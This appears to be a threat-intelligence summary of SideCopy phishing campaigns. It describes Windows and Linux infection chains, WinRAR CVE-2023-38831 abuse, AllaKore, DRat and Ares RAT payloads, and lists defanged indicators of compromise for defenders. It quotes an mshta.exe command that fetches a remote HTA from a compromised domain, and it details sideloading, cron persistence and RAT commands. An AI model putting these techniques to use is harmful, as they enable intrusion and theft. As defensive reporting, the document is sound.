Keypoints
- Phishing lures deliver archives (double-extension .lnk or WinRAR archives) that trigger remote HTA or ShellExecute-based payload execution.
- WinRAR CVE-2023-38831 is exploited to silently execute payloads inside archived folders via ShellExecute.
- Windows chain: .lnk → mshta.exe retrieves base64-embedded HTA/DLL → in-memory DLL decode and execution; DLL sideloading via legitimate executables provides persistence.
- Linux chain: archive drops ELF/PyInstaller payloads; stage1 creates crontab, drops decoy to ~/.local/share and runs Ares (Python) or Go-based binaries.
- Deployed payloads include AllaKore RAT, DRat, Key RAT (Windows) and a Linux variant of Ares RAT (Python), each exposing C2 channels and remote control commands.
- C2 and hosting infrastructure largely registered to Contabo GmbH; multiple compromised domains resolve to the same IPs, indicating reuse of infrastructure.
- IOCs include specific IPs (e.g., 38.242.149[.]89, 162.241.85[.]104), domains (sunfireglobal[.]in, rockwellroyalhomes[.]com), file hashes and phishing URLs.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Phishing links deliver archives that contain malicious .lnk or payloads (‘phishing link that downloads an archive file named “Homosexuality – Indian Armed Forces.”’)
- [T1203] Exploitation for Client Execution – WinRAR zero-day (CVE-2023-38831) is abused so opening a PDF launches the embedded payload via ShellExecute (‘Opening the PDF will trigger the vulnerability, quietly launching the payload inside the folder by ShellExecute function of the WinRAR application.’)
- [T1218.005] Mshta – Remote HTA files are executed via mshta.exe to fetch and run embedded code (‘C:WindowsSystem32mshta.exe “hxxps://sunfireglobal[.]in/public/assests/files/db/acr/”’)
- [T1574.002] DLL Side-Loading – Legitimate Windows executables are copied beside targets to sideload and run malicious DLLs (‘Legitimate Windows apps like Credential wizard (credwiz.exe) or EFS REKEY wizard (rekeywiz.exe) are copied beside the target to sideload the DLL.’)
- [T1053.003] Scheduled Task/Job: Cron – Linux stagers create cron entries for persistence under the current user (‘Create a crontab to maintain persistence through system reboot under the current username.’)
- [T1105] Ingress Tool Transfer – Stages and final payloads are downloaded from compromised domains to target paths during infection (‘it beacons to the same domain and downloads an HTA and the final DLL contents to their target paths.’)
- [T1027.009] Obfuscated Files or Information: Embedded Payloads – Archives/HTAs contain base64-encoded embedded decoy and DLLs which are decoded at runtime (‘It contains two embedded files that are base64 encoded; one is the decoy PDF, and the other is a DLL.’)
- [T1071.001] Application Layer Protocol: Web Protocols – Ares RAT pings C2 using HTTP(S) API endpoints for command/heartbeat (‘URL format used to ping the server is: “hxxps://(host)/api/(uid)/hello.”’)
Indicators of Compromise
- [IP] C2/hosting – 38.242.149[.]89 (AllaKore/DRat C2), 162.241.85[.]104 (compromised host), and other Contabo/hosting IPs.
- [Domain] Compromised delivery hosts – sunfireglobal[.]in, rockwellroyalhomes[.]com, and other reused domains (occoman[.]com, elfinindia[.]com, ssynergy[.]in).
- [URL] Phishing/download links – hxxps://sunfireglobal[.]in/public/core/homo/Homosexuality%20-%20Indian%20Armed%20Forces.zip, hxxps://www.rockwellroyalhomes[.]com/js/FL/DocScanner-Oct.zip.
- [File hash] Windows archives/samples – eb07a0063132e33c66d0984266afb8ae (DocScanner-Oct.zip), 8bee417262cf81bc45646da357541036 (Homosexuality – Indian Armed Forces.zip), and multiple other hashes listed.
- [File name] Decoys/payloads – ‘Homosexuality – Indian Armed Forces.pdf.lnk’, ‘DocScanner-Oct.pdf.lnk’, ‘bossupdate’ (Linux Ares), and ‘Msfront.exe’ (DRat).
- [C2 host:port] Ares endpoints – 38.242.220[.]166:9012, 161.97.151[.]220:7015 (Ares RAT API endpoints).
- [PDB / Dev Artefact] Build path – d:ProjectsC#D-RatDRat ClientTenureobjReleaseMSEclipse.pdb (links DRat to developer/build info).
SEQRITE’s technical analysis shows two primary infection chains used by SideCopy. In the Windows chain, phishing delivers archives containing a double-extension shortcut (.pdf.lnk) which invokes mshta.exe to fetch a remote HTA; that HTA carries base64-encoded payloads (decoy PDF + DLL). The DLL is decoded and executed in-memory; sideloading via copied legitimate executables (e.g., credwiz.exe) and Run/Startup registry keys provide persistence. A separate Windows vector leverages WinRAR CVE-2023-38831 where opening the decoy PDF triggers ShellExecute inside WinRAR to silently run the payload folder contents, dropping AllaKore RAT, DRat or Key RAT binaries that connect to C2 servers for data theft, keylogging, screenshots, and remote command execution.
On Linux, attackers deliver Go or PyInstaller-based artifacts masqueraded as PDFs; the stage1 stager creates a crontab, downloads decoy files to ~/.local/share, and drops the Ares Python agent (named ‘bossupdate’ or ‘gedit’). The Ares agent uses HTTP(S) API endpoints (hxxps://(host)/api/(uid)/hello) to heartbeat and accept commands such as upload, download, zip, screenshot, python execution, persist, clean, and shell execution. Extraction of PyInstaller contents revealed agent.pyc and config.pyc tying the samples to Ares forks; Go binaries were analyzed with GoReSym metadata extraction where applicable.
Across campaigns, domains and IPs are reused and resolve to Contabo-hosted servers acting as C2 (examples: 38.242.149[.]89 for AllaKore/DRat, 38.242.220[.]166:9012 and 161.97.151[.]220:7015 for Ares). Defenses should inspect for .lnk->mshta patterns, WinRAR CVE exploitation activity, in-memory DLL execution, abnormal outbound HTTP(S) to the noted C2 endpoints, cron additions on Linux, and the enumerated file hashes, URLs and filenames for detection and containment.